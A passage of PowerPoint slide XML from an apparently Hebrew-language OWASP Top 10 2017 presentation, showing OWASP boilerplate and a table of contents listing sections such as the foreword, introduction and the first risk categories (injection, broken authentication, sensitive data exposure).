                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, מנהלי הסניפים המקומיים, מנהלי הפרויקטים וחברי הפרויקטים.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אנו תומכים במחקר חדשני בתחום אבטחת המידע באמצעות מענקים ותמיכה.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הצטרפו אלינו!</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcP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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>TOC</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    תוכן העניינים</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3905945933"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1432560"/>
          <a:ext cx="3383280" cy="5669280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2998816">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="384464">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US" sz="950" b="1"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TOC</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US"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he-IL" sz="950" kern="120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תוכן העניינים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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he-IL" sz="950" kern="120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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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0"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US" sz="950" b="1"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FW</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US"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he-IL"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הקדמה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" kern="120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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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1"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US" sz="950" b="1"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I</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US"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he-IL" sz="950" kern="120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מבוא</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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he-IL" sz="950" kern="120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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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2"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US" sz="950" b="1"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RN</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US"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he-IL" sz="950" kern="120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הערות בנוגע למהדורה זו</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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he-IL" sz="950" kern="120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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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3"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US" sz="950" b="1"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Risk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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en-US"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he-IL" sz="950" kern="120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סיכונים בפיתוח מאובטח</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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en-US"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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4"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>T10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>עשרת האיומים הקריטיים לשנת 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>……......</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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5"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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A1:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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הזרקת קוד זדוני</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" kern="120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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" kern="120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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId18" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>7</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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6"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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A2:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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הזדהות שבורה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId19" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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7"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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A3:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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חשיפת מידע רגיש</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
